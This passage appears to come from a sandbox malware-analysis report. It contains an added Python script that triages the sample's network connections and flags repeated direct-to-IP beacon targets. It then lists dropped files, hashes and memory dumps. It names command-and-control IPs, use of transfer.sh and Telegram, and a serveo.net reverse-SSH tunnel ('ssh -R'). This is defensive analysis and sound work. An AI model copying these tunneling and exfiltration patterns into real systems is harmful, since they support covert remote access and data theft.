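The network table mixes three kinds of rows: DNS traffic to 8.8.8.8 (forward lookups the sample made, and reverse in-addr.arpa lookups the sandbox makes for every peer), TCP connections to hosts that were resolved by name (ip-api.com, serveo.net, api.telegram.org, transfer.sh), and a long run of TCP connections to two bare IPs on port 8080 with no name ever resolved. The Python below is an added example of triaging such a table, not code from the report: it parses the rows, sets reverse lookups aside, classifies each TCP destination and lists direct-to-IP destinations hit repeatedly as beacon candidates. The embedded rows are a subset copied from the table above; the classification rules and thresholds are our own.

```python
"""Triage of the behavioral2 "Network" table (added example).
Rows below are a subset copied from the report; the classification is ours."""
import ipaddress
from collections import Counter
from dataclasses import dataclass

NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
N/A 127.0.0.1:8229 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
"""


@dataclass(frozen=True)
class Flow:
    country: str
    dest: str      # ip:port
    domain: str    # '' where the report left the column empty
    proto: str


def parse_rows(text):
    """Parse the four-column table; tolerate the loopback row that has no domain."""
    flows = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue
        flows.append(Flow(country, dest, domain, proto))
    return flows


def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def forward_lookups(flows):
    """Domains the sample resolved; reverse lookups are sandbox noise."""
    return sorted({f.domain for f in flows
                   if f.proto == "udp" and f.dest.endswith(":53")
                   and not f.domain.endswith(".in-addr.arpa")})


def tcp_destinations(flows):
    """dest -> (hit count, domain, kind); kind is loopback, direct-to-ip or resolved."""
    hits = Counter((f.dest, f.domain) for f in flows if f.proto == "tcp")
    out = {}
    for (dest, domain), count in hits.items():
        ip = dest.rsplit(":", 1)[0]
        if ip.startswith("127."):
            kind = "loopback"          # local listener (cf. ssh -R 80:127.0.0.1:8229)
        elif domain == ip or (domain == "" and _is_ip(ip)):
            kind = "direct-to-ip"      # no name was ever resolved for this peer
        else:
            kind = "resolved"
        out[dest] = (count, domain, kind)
    return out


def beacon_candidates(flows, min_hits=3):
    """Direct-to-IP destinations contacted at least min_hits times."""
    return sorted(dest for dest, (count, _domain, kind) in tcp_destinations(flows).items()
                  if kind == "direct-to-ip" and count >= min_hits)


if __name__ == "__main__":
    flows = parse_rows(NETWORK_TABLE)
    print("resolved:", forward_lookups(flows))
    for dest, (count, domain, kind) in sorted(tcp_destinations(flows).items()):
        print("%-22s %2d hits  %-13s %s" % (dest, count, kind, domain))
    print("beacon candidates:", beacon_candidates(flows))
```

On the full table the two 8080 destinations account for the bulk of the rows, which is what the threshold is for; the 127.0.0.1:8229 row is the local side of the ssh -R forward shown in the process tree, not a remote peer, and is kept separate so it is not blocked as an IOC.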

Files

memory/1304-0-0x000002A63AEF0000-0x000002A63AF14000-memory.dmp

memory/1304-3-0x00007FFD45B20000-0x00007FFD465E1000-memory.dmp

memory/1304-4-0x000002A655420000-0x000002A655430000-memory.dmp

memory/1304-6-0x00007FFD45B20000-0x00007FFD465E1000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Vfd663501e1ac13eb331505b8388e675450.exe.log

MD5 3308a84a40841fab7dfec198b3c31af7
SHA1 4e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA512 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

memory/4244-11-0x00007FFD447E0000-0x00007FFD452A1000-memory.dmp

memory/4244-12-0x0000012C7CF50000-0x0000012C7CF60000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/4244-16-0x00007FFD447E0000-0x00007FFD452A1000-memory.dmp

memory/2596-17-0x00007FFD447E0000-0x00007FFD452A1000-memory.dmp

memory/2596-18-0x000001A131080000-0x000001A131090000-memory.dmp

C:\Users\Admin\AppData\Local\477mflh5px\port.dat

MD5 0396df57e78b6d04b6854dd682e27b3c
SHA1 67b3808fac79cbad380ff8550a72354870be5b73
SHA256 e9297a9f26942ce6d80b40dd566c86ee7ae4918109c50bdd306730ab5139e011
SHA512 ecc5b805d9039f6c9694ca59fd56c47c7cc27e8a6eafcfca4f1a95c5f0d2268d4dce3ee4b66444cd76fdd20c17e63ffed2e23da1dab8c8c05957e36f3d1c80e0

memory/4244-20-0x0000012C7CF50000-0x0000012C7CF60000-memory.dmp

C:\Users\Admin\.ssh\known_hosts

MD5 2ba3694520311cffb8e5d96217fd28f2
SHA1 7ed0af02238d6b1ce5becd6bdadbb85dca1b2a83
SHA256 121df228d77537d6043cb474e996d2b7279156ac540762e6cf1c0b35a378b626
SHA512 83536222c4dd6f326198b9681a0e7a4d44307648a2b4905a504e2c3f8e6113a79ec1d75adb160d77a107f3f0c5efe0a094e45aba2c29efa9e3e46f7e6cb17a7c

memory/2596-22-0x00007FFD447E0000-0x00007FFD452A1000-memory.dmp

memory/2596-23-0x000001A131080000-0x000001A131090000-memory.dmp